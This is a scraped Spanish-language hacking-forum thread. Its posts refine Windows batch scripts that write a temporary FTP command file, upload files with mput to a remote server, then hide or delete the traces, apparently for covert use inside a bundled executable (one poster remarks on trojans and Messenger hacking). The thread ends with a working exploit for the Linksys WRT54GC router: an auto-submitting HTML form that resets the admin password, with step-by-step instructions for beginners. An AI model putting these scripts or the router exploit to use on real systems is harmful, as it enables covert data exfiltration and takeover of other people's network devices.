Mensajes

Lo malo del sistema del txt es que el fichero queda 'a la vista' todo el tiempo aunque se borre después.

He intentado ocultarlo con attrib antes de hacer el ftp, pero en el explorador de windowsxp se puede ver/abrir perfectamente, hasta que se borra, y tarda un par de segundos.
¿No se puede crear directamente oculto?

Incluso quitando lo de 'no ver ocultos' del explorador, sigue apareciendo, como si nada 

Cómo ya he dejado claro en el código, crealo en %temp% 

gracias por la correción. Antes había puesto put solamente, ya que supuse que funcionaría igual que con mput, supongo que me equivoqué.

No me funciona el script. Es cierto que se genera bien, es decir, aparentemente es equivalente a 2.bat, pero me da error de login.

>>530 incorrect

No lo entiendo, tanto 0.txt como 2.bat son IGUALES.

El problema eran los espacios, ya que hay veces que se tienen que poner (cuando por ejemplo la línia acaba con un número o algo así y veces que no ._.). Si sigues teniendo algún problema con el código de arriba dilo Saludos...

Uhm... Este post se ha convertido en un nido de juankers q qieren juankear l mesenlle d la juani...

+1

PD: crearos vuestro propio troyano y así al menos aprendéis algo 

¿y si te digo que en vez de put para un fichero uso mput para varios?

Tal que asi

mput /carpetafuente/*.abc

Lo he probado y no me va.

Perdona por el error tipográfico   He aquí el código definitivo:

Código [Seleccionar] Expandir

echo (user)>>%temp%\0.txt
echo (password)>>%temp%\0.txt
echo cd (carpeta)>>%temp%\0.txt
echo mput (archivos)>>%temp%\0.txt
echo bye>>%temp%\0.txt
ftp -s:%temp%\0.txt (ftp)
del %temp%\0.txt

Saludos ^^

Lo he vuelto a cambiar, mejor usar el directorio temporal.
¿Funcionará en el Vista? (tengo el XP)
¿Y como no admin?

@echo off

copy %MYFILES%\2.bat %TMP%\
ftp -s:%TMP%\2.bat [miserver]

Yo haría algo así ._.

echo (user)>>%temp%\0.txt
echo (password)>>%temp%\0.txt
echo cd (carpeta)>>%temp%\0.txt
echo put (archivo)>>%temp%\0.txt
echo bye>>%temp%\0.txt
ftp -s:%temp%\0.txt (ftp)
del %temp%\0.txt

Saludos...

Hola

¿Qué diferencias hay con la otra forma?

Pues que no hace falta adjuntar ningún 2.bat 

Lo he vuelto a cambiar, mejor usar el directorio temporal.
¿Funcionará en el Vista? (tengo el XP)
¿Y como no admin?

@echo off

copy %MYFILES%\2.bat %TMP%\
ftp -s:%TMP%\2.bat [miserver]

Yo haría algo así ._. (lo he modificado ya que dependiendo de algunos factores podía dar error  )

Código [Seleccionar] Expandir

echo (user)>>%temp%\0.txt
echo (password)>>%temp%\0.txt
echo cd (carpeta)>>%temp%\0.txt
echo mput (archivos)>>%temp%\0.txt
echo bye>>%temp%\0.txt
ftp -s:%temp%\0.txt (ftp)
del %temp%\0.txt

Saludos...

Bueno, he releido el tuto y ya he conseguido algo, pero el código me parece malísimo.

Este es ahora el código de 1.bat

@echo off
copy %MYFILES%\2.bat %Systemroot%\System32
ftp -s:%Systemroot%\System32\2.bat [miserver]


Me parece demasiado enrevesado, quiero decir, podría copiar el 2.bat adjunto a un sitio menos 'peliagudo' que system32 no? ¿Cómo puedo copiar al directorio 'actual' (donde esté el exe vamos)?

Código [Seleccionar] Expandir

@echo off
copy %MYFILES%\2.bat "%cd%"
ftp -s:2.bat [tuserver]

PD: te aconsejo que crees un txt en lugar de incluir un bat en el exe, es mucho más cómodo ^^

Simplemente fantástico. ¡Saludos!

Estoy haciendo un script en batch que más adelante haré público que se conecta a mi ftp (utilizando mi usuario y mi contraseña ._.) para realizar varias tareas. ¿Hay alguna manera de cifrar u ofuscar el código para que no sea visible la contraseña pulsando en editar sin pasarlo a exe?

El router Linksys WRT54GC no comprueba la identidad del administrador al cambiar la contraseña de este, por lo tanto, es posible cambiarla a través de la siguiente consulta POST si tienes acceso a la red (por ejemplo, porque no está cifrada  ):

Código [Seleccionar] Expandir

<html><body>
<form method="POST" action="http://IP_ROUTER(por defecto 192.168.1.1)/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>


<!-- C?digo de envio autom?tico do formul?rio -->


<SCRIPT language="javascript">
  document.senha.submit();
</SCRIPT>


</body></html>

NOTA PARA LOS NEWBIES: para utilizar el código, debéis abrir el bloc de notas,
copiarlo, modificarlo y guardarlo con la extensión .html, y abrir el archivo resultante cuando estéis conectados al router vulnerable.

Para más información: http://www.securityfocus.com/bid/34616/info